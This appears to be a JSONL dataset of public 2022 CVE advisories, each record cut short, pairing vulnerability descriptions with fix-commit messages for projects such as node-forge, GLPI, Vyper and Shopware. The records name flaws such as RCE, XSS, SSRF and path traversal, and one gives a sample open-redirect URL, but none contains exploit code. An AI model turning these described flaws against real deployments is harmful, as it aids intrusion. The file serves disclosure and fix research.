developer's computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a fil", "cve_id": "CVE-2022-24770", "source": "cvefixes", "timestamp": ""} {"id": "adf65d8489e373c82f1c", "text": "CVE: CVE-2022-24771\n\n[{'lang': 'en', 'value': 'Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` v", "cve_id": "CVE-2022-24771", "source": "cvefixes", "timestamp": ""} {"id": "83dd2e078d46c6bf7203", "text": "CVE: CVE-2022-24772\n\n[{'lang': 'en', 'value': 'Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There", "cve_id": "CVE-2022-24772", "source": "cvefixes", "timestamp": ""} {"id": "9d9249878abf54f9a9a5", "text": "CVE: CVE-2022-24773\n\n[{'lang': 'en', 'value': 'Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.'}]\n\n", "cve_id": "CVE-2022-24773", "source": "cvefixes", "timestamp": ""} {"id": "cf651718efe68608f5a7", "text": "CVE: CVE-2022-24774\n\n[{'lang': 'en', 'value': 'CycloneDX BOM Repository Server is a bill of materials (BOM) repository server for distributing CycloneDX BOMs. CycloneDX BOM Repository Server before version 2.0.1 has an improper input validation vulnerability leading to path traversal. A malicious user may potentially exploit this vulnerability to create arbitrary directories or a denial of service by deleting arbitrary directories. The vulnerability is resolved in version 2.0.1. The vulnerabilit", "cve_id": "CVE-2022-24774", "source": "cvefixes", "timestamp": ""} {"id": "d0f93a9fa64907eb9d92", "text": "CVE: CVE-2022-24777\n\n[{'lang': 'en', 'value': 'grpc-swift is the Swift language implementation of gRPC, a remote procedure call (RPC) framework. Prior to version 1.7.2, a grpc-swift server is vulnerable to a denial of service attack via a reachable assertion. This is due to incorrect logic when handling GOAWAY frames. The attack is low-effort: it takes very little resources to construct and send the required sequence of frames. The impact on availability is high as the server will crash, droppin", "cve_id": "CVE-2022-24777", "source": "cvefixes", "timestamp": ""} {"id": "1e8b1ed7d493b40709a9", "text": "CVE: CVE-2022-24778\n\n[{'lang': 'en', 'value': 'The imgcrypt library provides API exensions for containerd to support encrypted container images and implements the ctd-decoder command line tool for use by containerd to decrypt encrypted container images. The imgcrypt function `CheckAuthorization` is supposed to check whether the current used is authorized to access an encrypted image and prevent the user from running an image that another user previously decrypted on the same system. In versions ", "cve_id": "CVE-2022-24778", "source": "cvefixes", "timestamp": ""} {"id": "e6e672dd7b3a809bd081", "text": "CVE: CVE-2022-24780\n\n[{'lang': 'en', 'value': 'Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.'}]\n\nFix commit: N°4384 Security hardening", "cve_id": "CVE-2022-24780", "source": "cvefixes", "timestamp": ""} {"id": "611d65a582d3a0c15b83", "text": "CVE: CVE-2022-24780\n\n[{'lang': 'en', 'value': 'Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.'}]\n\nFix commit: N°4384 Fix PHP warning when decoding formmanager_data when it is already in a P", "cve_id": "CVE-2022-24780", "source": "cvefixes", "timestamp": ""} {"id": "7825092c345009621cc7", "text": "CVE: CVE-2022-24780\n\n[{'lang': 'en', 'value': 'Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.'}]\n\nFix commit: N°4384 Security hardening\nModule parameter flag for extensions", "cve_id": "CVE-2022-24780", "source": "cvefixes", "timestamp": ""} {"id": "27f9833ac394c4eac825", "text": "CVE: CVE-2022-24781\n\n[{'lang': 'en', 'value': 'Geon is a board game based on solving questions about the Pythagorean Theorem. Malicious users can obtain the uuid from other users, spoof that uuid through the browser console and become co-owners of the target session. This issue is patched in version 1.1.0. No known workaround exists.'}]\n\nFix commit: Corrigido saida de usuarios crash do backend se o client manda algo que não seja do tipo string e implementação inicial de contador de usuarios cone", "cve_id": "CVE-2022-24781", "source": "cvefixes", "timestamp": ""} {"id": "ea3a914e707ba9098dc1", "text": "CVE: CVE-2022-24782\n\n[{'lang': 'en', 'value': \"Discourse is an open source discussion platform. Versions 2.8.2 and prior in the `stable` branch, 2.9.0.beta3 and prior in the `beta` branch, and 2.9.0.beta3 and prior in the `tests-passed` branch are vulnerable to a data leak. Users can request an export of their own activity. Sometimes, due to category settings, they may have category membership for a secure category. The name of this secure category is shown to the user in the export. The same th", "cve_id": "CVE-2022-24782", "source": "cvefixes", "timestamp": ""} {"id": "255d4c2396257fa08ca1", "text": "CVE: CVE-2022-24785\n\n[{'lang': 'en', 'value': 'Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing ", "cve_id": "CVE-2022-24785", "source": "cvefixes", "timestamp": ""} {"id": "60f6e560d5aa51990348", "text": "CVE: CVE-2022-24786\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C. PJSIP versions 2.12 and prior do not parse incoming RTCP feedback RPSI (Reference Picture Selection Indication) packet, but any app that directly uses pjmedia_rtcp_fb_parse_rpsi() will be affected. A patch is available in the `master` branch of the `pjsip/pjproject` GitHub repository. There are currently no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-v", "cve_id": "CVE-2022-24786", "source": "cvefixes", "timestamp": ""} {"id": "36c9de60c89adc889e0a", "text": "CVE: CVE-2022-24787\n\n[{'lang': 'en', 'value': 'Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. In version 0.3.1 and prior, bytestrings can have dirty bytes in them, resulting in the word-for-word comparisons giving incorrect results. Even without dirty nonzero bytes, two bytestrings can compare to equal if one ends with `\"\\\\x00\"` because there is no comparison of the length. A patch is available and expected to be part of the 0.3.2 release. There are currently no kn", "cve_id": "CVE-2022-24787", "source": "cvefixes", "timestamp": ""} {"id": "9525310ef03694fcdd43", "text": "CVE: CVE-2022-24788\n\n[{'lang': 'en', 'value': 'Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. Versions of vyper prior to 0.3.2 suffer from a potential buffer overrun. Importing a function from a JSON interface which returns `bytes` generates bytecode which does not clamp bytes length, potentially resulting in a buffer overrun. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-j2x6-9323-fp7h\n\nTh", "cve_id": "CVE-2022-24788", "source": "cvefixes", "timestamp": ""} {"id": "fe52c13cf47ee06e4885", "text": "CVE: CVE-2022-24791\n\n[{'lang': 'en', 'value': 'Wasmtime is a standalone JIT-style runtime for WebAssembly, using Cranelift. There is a use after free vulnerability in Wasmtime when both running Wasm that uses externrefs and enabling epoch interruption in Wasmtime. If you are not explicitly enabling epoch interruption (it is disabled by default) then you are not affected. If you are explicitly disabling the Wasm reference types proposal (it is enabled by default) then you are also not affected. T", "cve_id": "CVE-2022-24791", "source": "cvefixes", "timestamp": ""} {"id": "33b6604544b62a5513f8", "text": "CVE: CVE-2022-24792\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C. A denial-of-service vulnerability affects applications on a 32-bit systems that use PJSIP versions 2.12 and prior to play/read invalid WAV files. The vulnerability occurs when reading WAV file data chunks with length greater than 31-bit integers. The vulnerability does not affect 64-bit apps and should not affect apps that only plays trusted WAV files. A patch is availabl", "cve_id": "CVE-2022-24792", "source": "cvefixes", "timestamp": ""} {"id": "b7b3da818bbb1b9f0e53", "text": "CVE: CVE-2022-24793\n\n[{'lang': 'en', 'value': \"PJSIP is a free and open source multimedia communication library written in C. A buffer overflow vulnerability in versions 2.12 and prior affects applications that uses PJSIP DNS resolution. It doesn't affect PJSIP users who utilize an external resolver. A patch is available in the `master` branch of the `pjsip/pjproject` GitHub repository. A workaround is to disable DNS resolution in PJSIP config (by setting `nameserver_count` to zero) or use an ex", "cve_id": "CVE-2022-24793", "source": "cvefixes", "timestamp": ""} {"id": "603a5728fae7df4d7d3f", "text": "CVE: CVE-2022-24794\n\n[{'lang': 'en', 'value': 'Express OpenID Connect is an Express JS middleware implementing sign on for Express web apps using OpenID Connect. Users of the `requiresAuth` middleware, either directly or through the default `authRequired` option, are vulnerable to an Open Redirect when the middleware is applied to a catch all route. If all routes under `example.com` are protected with the `requiresAuth` middleware, a visit to `http://example.com//google.com` will be redirected t", "cve_id": "CVE-2022-24794", "source": "cvefixes", "timestamp": ""} {"id": "4930d421e1822c41e152", "text": "CVE: CVE-2022-24795\n\n[{'lang': 'en', 'value': 'yajl-ruby is a C binding to the YAJL JSON parsing and generation library. The 1.x branch and the 2.x branch of `yajl` contain an integer overflow which leads to subsequent heap memory corruption when dealing with large (~2GB) inputs. The reallocation logic at `yajl_buf.c#L64` may result in the `need` 32bit integer wrapping to 0 when `need` approaches a value of 0x80000000 (i.e. ~2GB of data), which results in a reallocation of buf->alloc into a smal", "cve_id": "CVE-2022-24795", "source": "cvefixes", "timestamp": ""} {"id": "6ecce40f300f72a5d866", "text": "CVE: CVE-2022-24796\n\n[{'lang': 'en', 'value': 'RaspberryMatic is a free and open-source operating system for running a cloud-free smart-home using the homematicIP / HomeMatic hardware line of IoT devices. A Remote Code Execution (RCE) vulnerability in the file upload facility of the WebUI interface of RaspberryMatic exists. Missing input validation/sanitization in the file upload mechanism allows remote, unauthenticated attackers with network access to the WebUI interface to achieve arbitrary op", "cve_id": "CVE-2022-24796", "source": "cvefixes", "timestamp": ""} {"id": "6b55f5b5471e48d0f408", "text": "CVE: CVE-2022-24797\n\n[{'lang': 'en', 'value': \"Pomerium is an identity-aware access proxy. In distributed service mode, Pomerium's Authenticate service exposes pprof debug and prometheus metrics handlers to untrusted traffic. This can leak potentially sensitive environmental information or lead to limited denial of service conditions. This issue is patched in version v0.17.1 Workarounds: Block access to `/debug` and `/metrics` paths on the authenticate service. This can be done with any L7 proxy", "cve_id": "CVE-2022-24797", "source": "cvefixes", "timestamp": ""} {"id": "669e9ffae9a878429471", "text": "CVE: CVE-2022-24798\n\n[{'lang': 'en', 'value': 'Internet Routing Registry daemon version 4 is an IRR database server, processing IRR objects in the RPSL format. IRRd did not always filter password hashes in query responses relating to `mntner` objects and database exports. This may have allowed adversaries to retrieve some of these hashes, perform a brute-force search for the clear-text passphrase, and use these to make unauthorised changes to affected IRR objects. This issue only affected instan", "cve_id": "CVE-2022-24798", "source": "cvefixes", "timestamp": ""} {"id": "61ab8f79486c26990c61", "text": "CVE: CVE-2022-24799\n\n[{'lang': 'en', 'value': 'wire-webapp is the web application interface for the wire messaging service. Insufficient escaping in markdown “code highlighting” in the wire-webapp resulted in the possibility of injecting and executing arbitrary HTML code and thus also JavaScript. If a user receives and views such a malicious message, arbitrary code is injected and executed in the context of the victim. This allows the attacker to fully control the user account. Wire-desktop clie", "cve_id": "CVE-2022-24799", "source": "cvefixes", "timestamp": ""} {"id": "8cf000646f18267045fa", "text": "CVE: CVE-2022-24800\n\n[{'lang': 'en', 'value': 'October/System is the system module for October CMS, a self-hosted CMS platform based on the Laravel PHP Framework. Prior to versions 1.0.476, 1.1.12, and 2.2.15, when the developer allows the user to specify their own filename in the `fromData` method, an unauthenticated user can perform remote code execution (RCE) by exploiting a race condition in the temporary storage directory. This vulnerability affects plugins that expose the `October\\\\Rain\\\\D", "cve_id": "CVE-2022-24800", "source": "cvefixes", "timestamp": ""} {"id": "2904c3b7c25bd465c02d", "text": "CVE: CVE-2022-24801\n\n[{'lang': 'en', 'value': \"Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to version 22.4.0rc1, the Twisted Web HTTP 1.1 server, located in the `twisted.web.http` module, parsed several HTTP request constructs more leniently than permitted by RFC 7230. This non-conformant parsing can lead to desync if requests pass through multiple HTTP parsers, potentially resulting in HTTP request smuggling. Users who may be affected use Twisted", "cve_id": "CVE-2022-24801", "source": "cvefixes", "timestamp": ""} {"id": "d601ca0c48bd6f032e3d", "text": "CVE: CVE-2022-24802\n\n[{'lang': 'en', 'value': 'deepmerge-ts is a typescript library providing functionality to deep merging of javascript objects. deepmerge-ts is vulnerable to Prototype Pollution via file deepmerge.ts, function defaultMergeRecords(). This issue has been patched in version 4.0.2. There are no known workarounds for this issue.'}]\n\nFix commit: fix: protect against prototype pollution", "cve_id": "CVE-2022-24802", "source": "cvefixes", "timestamp": ""} {"id": "b8fd2961eae68d51f86c", "text": "CVE: CVE-2022-24802\n\n[{'lang': 'en', 'value': 'deepmerge-ts is a typescript library providing functionality to deep merging of javascript objects. deepmerge-ts is vulnerable to Prototype Pollution via file deepmerge.ts, function defaultMergeRecords(). This issue has been patched in version 4.0.2. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request #86 from RebeccaStevens/security/prototype-pollution", "cve_id": "CVE-2022-24802", "source": "cvefixes", "timestamp": ""} {"id": "1cb5c129ba7eb3488ed6", "text": "CVE: CVE-2022-24803\n\n[{'lang': 'en', 'value': 'Asciidoctor-include-ext is Asciidoctor’s standard include processor reimplemented as an extension. Versions prior to 0.4.0, when used to render user-supplied input in AsciiDoc markup, may allow an attacker to execute arbitrary system commands on the host operating system. This attack is possible even when `allow-uri-read` is disabled! The problem has been patched in the referenced commits.'}]\n\nFix commit: Make #read_lines code more robust, avoid usi", "cve_id": "CVE-2022-24803", "source": "cvefixes", "timestamp": ""} {"id": "96e09aefa5cd61a9a977", "text": "CVE: CVE-2022-24803\n\n[{'lang': 'en', 'value': 'Asciidoctor-include-ext is Asciidoctor’s standard include processor reimplemented as an extension. Versions prior to 0.4.0, when used to render user-supplied input in AsciiDoc markup, may allow an attacker to execute arbitrary system commands on the host operating system. This attack is possible even when `allow-uri-read` is disabled! The problem has been patched in the referenced commits.'}]\n\nFix commit: Fix command injection vulnerability\n\nReporte", "cve_id": "CVE-2022-24803", "source": "cvefixes", "timestamp": ""} {"id": "2e9f034a2e19e002a597", "text": "CVE: CVE-2022-24804\n\n[{'lang': 'en', 'value': \"Discourse is an open source platform for community discussion. In stable versions prior to 2.8.3 and beta versions prior 2.9.0.beta4 erroneously expose groups. When a group with restricted visibility has been used to set the permissions of a category, the name of the group is leaked to any user that is able to see the category. To workaround the problem, a site administrator can remove groups with restricted visibility from any category's permission", "cve_id": "CVE-2022-24804", "source": "cvefixes", "timestamp": ""} {"id": "7eaa852f97981f9b2ad5", "text": "CVE: CVE-2022-24811\n\n[{'lang': 'en', 'value': 'Combodi iTop is a web based IT Service Management tool. Prior to versions 2.7.6 and 3.0.0, cross-site scripting is possible for scripts outside of script tags when displaying HTML attachments. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.'}]\n\nFix commit: N°4129 - Security hardening", "cve_id": "CVE-2022-24811", "source": "cvefixes", "timestamp": ""} {"id": "dacdef0012d8bd119078", "text": "CVE: CVE-2022-24813\n\n[{'lang': 'en', 'value': \"CreateWiki is Miraheze's MediaWiki extension for requesting & creating wikis. Without the patch for this issue, anonymous comments can be made using Special:RequestWikiQueue when sent directly via POST. A patch for this issue is available in the `master` branch of CreateWiki's GitHub repository.\"}]\n\nFix commit: T9018: Add submission check for anonymous users POSTing", "cve_id": "CVE-2022-24813", "source": "cvefixes", "timestamp": ""} {"id": "60209cb1fcb42b858192", "text": "CVE: CVE-2022-24815\n\n[{'lang': 'en', 'value': 'JHipster is a development platform to quickly generate, develop, & deploy modern web applications & microservice architectures. SQL Injection vulnerability in entities for applications generated with the option \"reactive with Spring WebFlux\" enabled and an SQL database using r2dbc. Applications created without \"reactive with Spring WebFlux\" and applications with NoSQL databases are not affected. Users who have generated a microservice Gateway using ", "cve_id": "CVE-2022-24815", "source": "cvefixes", "timestamp": ""} {"id": "f28cc2a02d87594cf303", "text": "CVE: CVE-2022-24816\n\n[{'lang': 'en', 'value': 'JAI-EXT is an open-source project which aims to extend the Java Advanced Imaging (JAI) API. Programs allowing Jiffle script to be provided via network request can lead to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project. Version 1.2.22 will contain a patch that disables the ability to inject malicious code into the resulting script. Users un", "cve_id": "CVE-2022-24816", "source": "cvefixes", "timestamp": ""} {"id": "c0c62576c655918a7f06", "text": "CVE: CVE-2022-24818\n\n[{'lang': 'en', 'value': 'GeoTools is an open source Java library that provides tools for geospatial data. The GeoTools library has a number of data sources that can perform unchecked JNDI lookups, which in turn can be used to perform class deserialization and result in arbitrary code execution. Similar to the Log4J case, the vulnerability can be triggered if the JNDI names are user-provided, but requires admin-level login to be triggered. The lookups are now restricted in G", "cve_id": "CVE-2022-24818", "source": "cvefixes", "timestamp": ""} {"id": "6524d7338e81806322b2", "text": "CVE: CVE-2022-24822\n\n[{'lang': 'en', 'value': 'Podium is a library for building micro frontends. @podium/layout is a module for building a Podium layout server, and @podium/proxy is a module for proxying HTTP requests from a layout server to a podlet server. In @podium/layout prior to version 4.6.110 and @podium/proxy prior to version 4.2.74, an attacker using the `Trailer` header as part of the request against proxy endpoints has the ability to take down the server. All Podium layouts that incl", "cve_id": "CVE-2022-24822", "source": "cvefixes", "timestamp": ""} {"id": "9858541d5eea1acaa2cd", "text": "CVE: CVE-2022-24823\n\n[{'lang': 'en', 'value': \"Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additional", "cve_id": "CVE-2022-24823", "source": "cvefixes", "timestamp": ""} {"id": "0c306c2c09f6bf4fabdb", "text": "CVE: CVE-2022-24828\n\n[{'lang': 'en', 'value': \"Composer is a dependency manager for the PHP programming language. Integrators using Composer code to call `VcsDriver::getFileContent` can have a code injection vulnerability if the user can control the `$file` or `$identifier` argument. This leads to a vulnerability on packagist.org for example where the composer.json's `readme` field can be used as a vector for injecting parameters into hg/Mercurial via the `$file` argument, or git via the `$ident", "cve_id": "CVE-2022-24828", "source": "cvefixes", "timestamp": ""} {"id": "9026a6f80303b6eef6d2", "text": "CVE: CVE-2022-24829\n\n[{'lang': 'en', 'value': 'Garden is an automation platform for Kubernetes development and testing. In versions prior to 0.12.39 multiple endpoints did not require authentication. In some operating modes this allows for an attacker to gain access to the application erroneously. The configuration is leaked through the /api endpoint on the local server that is responsible for serving the Garden dashboard. At the moment, this server is accessible to 0.0.0.0 which makes it access", "cve_id": "CVE-2022-24829", "source": "cvefixes", "timestamp": ""} {"id": "793d62cf20e9a48eaf70", "text": "CVE: CVE-2022-24830\n\n[{'lang': 'en', 'value': 'OpenClinica is an open source software for Electronic Data Capture (EDC) and Clinical Data Management (CDM). OpenClinica prior to version 3.16 is vulnerable to path traversal in multiple endpoints, leading to arbitrary file read/write, and potential remote code execution. There are no known workarounds. This issue has been patched and users are recommended to upgrade.'}]\n\nFix commit: OC-17139: code changes after code review", "cve_id": "CVE-2022-24830", "source": "cvefixes", "timestamp": ""} {"id": "8ff660b39fb726b7023a", "text": "CVE: CVE-2022-24832\n\n[{'lang': 'en', 'value': 'GoCD is an open source a continuous delivery server. The bundled gocd-ldap-authentication-plugin included with the GoCD Server fails to correctly escape special characters when using the username to construct LDAP queries. While this does not directly allow arbitrary LDAP data exfiltration, it can allow an existing LDAP-authenticated GoCD user with malicious intent to construct and execute malicious queries, allowing them to deduce facts about other", "cve_id": "CVE-2022-24832", "source": "cvefixes", "timestamp": ""} {"id": "d9eac5db7b2f7a5b73fa", "text": "CVE: CVE-2022-24833\n\n[{'lang': 'en', 'value': \"PrivateBin is minimalist, open source online pastebin clone where the server has zero knowledge of pasted data. In PrivateBin < v1.4.0 a cross-site scripting (XSS) vulnerability was found. The vulnerability is present in all versions from v0.21 of the project, which was at the time still called ZeroBin. The issue is caused by the fact that SVGs can contain JavaScript. This can allow an attacker to execute code, if the user opens a paste with a speci", "cve_id": "CVE-2022-24833", "source": "cvefixes", "timestamp": ""} {"id": "cf17a86999dbb22ff3ec", "text": "CVE: CVE-2022-24838\n\n[{'lang': 'en', 'value': \"Nextcloud Calendar is a calendar application for the nextcloud framework. SMTP Command Injection in Appointment Emails via Newlines: as newlines and special characters are not sanitized in the email value in the JSON request, a malicious attacker can inject newlines to break out of the `RCPT TO: ` SMTP command and begin injecting arbitrary SMTP commands. It is recommended that Calendar is upgraded to 3.2.2. There are no workaro", "cve_id": "CVE-2022-24838", "source": "cvefixes", "timestamp": ""} {"id": "ccb45ed978686bf78389", "text": "CVE: CVE-2022-24839\n\n[{'lang': 'en', 'value': 'org.cyberneko.html is an html parser written in Java. The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup. Users are advised to upgrade to `>= 1.9.22.noko2`. Note: The upstream library `org.cyberneko.html` is no longer maintained. Nokogiri uses its own fork of this library located at https://github.com/sparklemotion/nekohtml and this CVE applies only to that ", "cve_id": "CVE-2022-24839", "source": "cvefixes", "timestamp": ""} {"id": "4b2b6849ba9512f5824e", "text": "CVE: CVE-2022-24840\n\n[{'lang': 'en', 'value': 'django-s3file is a lightweight file upload input for Django and Amazon S3 . In versions prior to 5.5.1 it was possible to traverse the entire AWS S3 bucket and in most cases to access or delete files. If the `AWS_LOCATION` setting was set, traversal was limited to that location only. The issue was discovered by the maintainer. There were no reports of the vulnerability being known to or exploited by a third party, prior to the release of the patch. ", "cve_id": "CVE-2022-24840", "source": "cvefixes", "timestamp": ""} {"id": "cc2cc14ced02cd68dfcf", "text": "CVE: CVE-2022-24841\n\n[{'lang': 'en', 'value': 'fleetdm/fleet is an open source device management, built on osquery. All versions of fleet making use of the teams feature are affected by this authorization bypass issue. Fleet instances without teams, or with teams but without restricted team accounts are not affected. In affected versions a team admin can erroneously add themselves as admin, maintainer or observer on other teams. Users are advised to upgrade to version 4.13. There are no known wo", "cve_id": "CVE-2022-24841", "source": "cvefixes", "timestamp": ""} {"id": "7374933b179fb7e28618", "text": "CVE: CVE-2022-24842\n\n[{'lang': 'en', 'value': 'MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. A security issue was found where an non-admin user is able to create service accounts for root or other admin users and then is able to assume their access policies via the generated credentials. This in turn allows the user to escalate privilege to that of the root user. This vulnerability has been resolved in pull request #14729 and is included in `RE", "cve_id": "CVE-2022-24842", "source": "cvefixes", "timestamp": ""} {"id": "f613e41c6b105dc0d361", "text": "CVE: CVE-2022-24845\n\n[{'lang': 'en', 'value': 'Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. In affected versions, the return of `.returns_int128()` is not validated to fall within the bounds of `int128`. This issue can result in a misinterpretation of the integer value and lead to incorrect behavior. As of v0.3.0, `.returns_int128()` is validated in simple expressions, but not complex expressions. Users are advised to upgrade. There is no known work", "cve_id": "CVE-2022-24845", "source": "cvefixes", "timestamp": ""} {"id": "bbe5c990749730672108", "text": "CVE: CVE-2022-24851\n\n[{'lang': 'en', 'value': 'LDAP Account Manager (LAM) is an open source web frontend for managing entries stored in an LDAP directory. The profile editor tool has an edit profile functionality, the parameters on this page are not properly sanitized and hence leads to stored XSS attacks. An authenticated user can store XSS payloads in the profiles, which gets triggered when any other user try to access the edit profile page. The pdf editor tool has an edit pdf profile function", "cve_id": "CVE-2022-24851", "source": "cvefixes", "timestamp": ""} {"id": "df74853d28a453f693e9", "text": "CVE: CVE-2022-24856\n\n[{'lang': 'en', 'value': 'FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery (SSRF) when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. The patch for this issue deletes the entire `cors_proxy`, as this i", "cve_id": "CVE-2022-24856", "source": "cvefixes", "timestamp": ""} {"id": "e3af071fafc50b56ff34", "text": "CVE: CVE-2022-24857\n\n[{'lang': 'en', 'value': \"django-mfa3 is a library that implements multi factor authentication for the django web framework. It achieves this by modifying the regular login view. Django however has a second login view for its admin area. This second login view was not modified, so the multi factor authentication can be bypassed. Users are affected if they have activated both django-mfa3 (< 0.5.0) and django.contrib.admin and have not taken any other measures to prevent users", "cve_id": "CVE-2022-24857", "source": "cvefixes", "timestamp": ""} {"id": "67a208ae5b1f11b4416a", "text": "CVE: CVE-2022-24861\n\n[{'lang': 'en', 'value': 'Databasir is a team-oriented relational database model document management platform. Databasir 1.01 has remote code execution vulnerability. JDBC drivers are not validated prior to use and may be provided by users of the system. This can lead to code execution by any basic user who has access to the system. Users are advised to upgrade. There are no known workarounds to this issue.'}]\n\nFix commit: fix some security bug (#103)\n\n* fix: use hard-code s", "cve_id": "CVE-2022-24861", "source": "cvefixes", "timestamp": ""} {"id": "90f057d3f7d8bbe415ba", "text": "CVE: CVE-2022-24863\n\n[{'lang': 'en', 'value': 'http-swagger is an open source wrapper to automatically generate RESTful API documentation with Swagger 2.0. In versions of http-swagger prior to 1.2.6 an attacker may perform a denial of service attack consisting of memory exhaustion on the host system. The cause of the memory exhaustion is down to improper handling of http methods. Users are advised to upgrade. Users unable to upgrade may to restrict the path prefix to the \"GET\" method as a workar", "cve_id": "CVE-2022-24863", "source": "cvefixes", "timestamp": ""} {"id": "637c886486c6f55685fb", "text": "CVE: CVE-2022-24865\n\n[{'lang': 'en', 'value': \"HumHub is an Open Source Enterprise Social Network. In affected versions users who are forced to change their password by an administrator may retrieve other users' data. This issue has been resolved by commit `eb83de20`. It is recommended that the HumHub is upgraded to 1.11.0, 1.10.4 or 1.9.4. There are no known workarounds for this issue.\"}]\n\nFix commit: Fix must change password (#5638)\n\n* Fix must change password\r\n\r\n* Update CHANGELOG.md (#5638)\r", "cve_id": "CVE-2022-24865", "source": "cvefixes", "timestamp": ""} {"id": "a7de21fbb0de1d8967a7", "text": "CVE: CVE-2022-24867\n\n[{'lang': 'en', 'value': 'GLPI is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. When you pass the config to the javascript, some entries are filtered out. The variable ldap_pass is not filtered and when you look at the source code of the rendered page, we can see the password for the root dn. Users are advised to upgrade. There is no known workaround for this issue.'}]\n\nFix commit: Do not e", "cve_id": "CVE-2022-24867", "source": "cvefixes", "timestamp": ""} {"id": "f41c9beb873bd598ee58", "text": "CVE: CVE-2022-24868\n\n[{'lang': 'en', 'value': 'GLPI is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. In versions prior to 10.0.0 one can exploit a lack of sanitization on SVG file uploads and inject javascript into their user avatar. As a result any user viewing the avatar will be subject to a cross site scripting attack. Users of GLPI are advised to upgrade. Users unable to upgrade should disallow SVG avatars.", "cve_id": "CVE-2022-24868", "source": "cvefixes", "timestamp": ""} {"id": "9cd32cff4741cb275264", "text": "CVE: CVE-2022-24869\n\n[{'lang': 'en', 'value': \"GLPI is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. In versions prior to 10.0.0 one can use ticket's followups or setup login messages with a stylesheet link. This may allow for a cross site scripting attack vector. This issue is partially mitigated by cors security of browsers, though users are still advised to upgrade.\"}]\n\nFix commit: Merge pull request from GH", "cve_id": "CVE-2022-24869", "source": "cvefixes", "timestamp": ""} {"id": "ea2030b1dcaf6be48726", "text": "CVE: CVE-2022-24871\n\n[{'lang': 'en', 'value': 'Shopware is an open commerce platform based on Symfony Framework and Vue. In affected versions an attacker can abuse the Admin SDK functionality on the server to read or update internal resources. Users are advised to update to the current version 6.4.10.1. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. There are no known workarounds for this issue.'}]\n\nFix commit: NEXT-21034 - Dont restore ", "cve_id": "CVE-2022-24871", "source": "cvefixes", "timestamp": ""} {"id": "d5354708a3ead99baf08", "text": "CVE: CVE-2022-24872\n\n[{'lang': 'en', 'value': 'Shopware is an open commerce platform based on Symfony Framework and Vue. Permissions set to sales channel context by admin-api are still usable within normal user session. Users are advised to update to the current version 6.4.10.1. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. There are no known workarounds for this issue.'}]\n\nFix commit: NEXT-21034 - Dont restore permissions", "cve_id": "CVE-2022-24872", "source": "cvefixes", "timestamp": ""} {"id": "9ee0d48b1dd3fb41252b", "text": "CVE: CVE-2022-24875\n\n[{'lang': 'en', 'value': 'The CVEProject/cve-services is an open source project used to operate the CVE services api. In versions up to and including 1.1.1 the `org.conroller.js` code would erroneously log user secrets. This has been resolved in commit `46d98f2b` and should be available in subsequent versions of the software. Users of the software are advised to manually apply the `46d98f2b` commit or to update when a new version becomes available. As a workaround users shou", "cve_id": 